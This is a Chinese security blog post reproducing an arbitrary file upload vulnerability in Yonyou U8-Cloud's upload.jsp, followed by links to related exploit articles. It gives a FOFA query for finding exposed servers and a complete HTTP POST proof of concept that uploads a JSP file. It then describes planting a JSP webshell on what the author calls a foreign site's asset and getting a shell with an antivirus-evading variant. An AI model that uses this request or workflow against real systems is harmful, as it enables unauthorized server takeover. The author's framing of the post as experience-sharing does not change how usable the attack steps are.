漏洞复现--用友U8-Cloud upload.jsp任意文件上传

最新推荐文章于 2024-04-02 11:13:30 发布
最新推荐文章于 2024-04-02 11:13:30 发布
阅读量534 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134054321
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品upload.jsp存在任意文件上传漏洞

二:漏洞影响版本

用友U8-Cloud

三:网络空间测绘查询

fofa:
app="用友-U8-Cloud"
image.png

四:漏洞复现

image.png
POC:


POST /linux/pages/upload.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=F0344BD3C6761D7E4CFDDD76960710B1.server; JSESSIONID=297190CC38DE8614285AD7DC95102AFB.server
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
filename: hack.jsp
Content-Length: 56


<% out.println("The website has vulnerabilities!!");%>

image.png
上传路径在/linux/{filename}.jsp
image.png

五:漏洞利用

此处为国外网站资产,请勿非法利用!
image.png
写入JSP马
image.png
让杀了,尴尬了
上传免杀马直接getshell

芝士土包鼠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞用友-移动系统管理-uploadcomponent-任意文件
知黑而守白
01-26 78
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理允许攻击者通过 uploadComponent 接口构造特定的请求包进行任意文件。该漏洞使得攻击者可以在受影响的系统上上恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上恶意文件来滥用系统,可能导致灾难性后果。
用友u8-ERP应用流程.doc
11-03
用友u8-ERP应用流程
实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件漏洞+getshell
随心所欲不逾矩
09-19 768
软件介绍:用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实。emmm,怎么说呢,就是又在一次加班码到晚上十点的时候,挖掘到了一个用友时空ksoa v9.0文件漏洞。开开心心连接马,嗯,连不上,emm,头疼,有防御。上成功是这个模样,嗯,被解析了。但是,发,有360主动防御,很头疼。
漏洞用友U8 Cloud upload任意文件漏洞
最新发布
qq_34780861的博客
04-02 209
用友U8 cloud前台任意文件导致远程命令执行漏洞。未经授权攻击者通过漏洞任意文件,最终可以获取服务器权限。
最新用友NC6.5文件漏洞
Azjj
12-09 9887
0x00漏洞公告 用友NC产品文件漏洞,恶意攻击者可以通过该漏洞任意文件,从而可能导致获取到目标系统管理权限,目前,官方暂未发布补丁公告,建议使用该产品用户及时关注官方安全漏洞公告和补丁更新动态。 0x01影响范围 用友NC远程代码执行漏洞影响版本:NC6.5之后版本。 0x02漏洞描述 根据分析,漏洞文件漏洞,在无需登陆系统的情况下,通过某接口直接上文件,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大,建议及时排查。 0x03 漏洞exp
用友U8 oa协同工作系统 文件漏洞_57
fushuang333的博客
02-24 952
用友U8 oa协同工作系统 文件漏洞,上文件漏洞的影响可能会非常严重,上可执行代码可能让攻击者获得服务器控制权。
用友U8-Cloud upload.jsp任意文件漏洞
CommputerMac的博客
10-24 409
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实企业互联网资源连接、共享、协同。该系统upload.jsp存在任意文件漏洞,攻击者可通过该漏洞木马,远程控制服务器。
用友u8c文件
weixin_51345872的博客
03-17 1790
文件
用友U8+OA doUpload.jsp 文件漏洞
weixin_52204925的博客
02-08 773
用友U8+OA doUpload.jsp 文件漏洞
金盘移动图书馆系统 doUpload RCE漏洞
0xSec
01-25 555
金盘移动图书馆系统 doUpload.jsp接口处存在文件漏洞,未经身份验证的攻击者可以利用此漏洞webshell,执行恶意代码指令,导致服务器失陷。
用友U8-OA标准方案.docx
05-26
用友U8-OA标准方案
ERP用友U8培训手册-存货档案与物料清单.pptx
04-15
ERP用友U8培训手册-存货档案与物料清单
用友U8C快速实施-总账.pptx
02-16
用友U8C快速实施-总账
用友U8C预警平台-20190420.pptx
02-16
用友U8C预警平台-20190420
【1day】用友 U8 Cloud系统upload.jsp接口任意文件漏洞学习
记录并分享学习安全的知识点..
12-05 478
用友U8 Cloud是中国企业软件公司用友软件推出的一款云端企业管理软件解决方案。它基于云计算和大数据技术,为企业提供全面的企业管理功能和服务。用友 U8 Cloud系统upload.jsp接口存在任意文件漏洞,攻击者通过上恶意文件,从而在Web服务器上执行未经授权的操作。
用友移动管理系统 upload任意文件漏洞
Keepb1ue的博客
01-11 530
用友移动系统管理系统是用友公司推出的一款移动办公解决方案,旨在帮助企业实移动办公、提高管理效率和员工工作灵活性。
用友移动管理系统 任意文件
m0_46317063的博客
08-21 254
用友移动管理系统 任意文件漏洞[2023-HW 0DAY]
漏洞用友U8-Cloud 存在任意文件漏洞
失心少年
11-17 405
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实企业互联网资源连接、共享、协同。
用友u8 cloud 反序列化rce漏洞
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发存在反序列化远程命令执行(RCE)漏洞。要这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,然后将这个数据递给U8 Cloud系统,让系统进行反序列化操作。当系统对这个数据进行反序列化时,就会触发我们植入的恶意代码,从而实远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列化数据,并将其发给U8 Cloud系统。系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了反序列化漏洞来实远程命令执行。 当然,为了成功这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列化数据。在过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商反馈该漏洞,以便及时修和加强系统安全防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值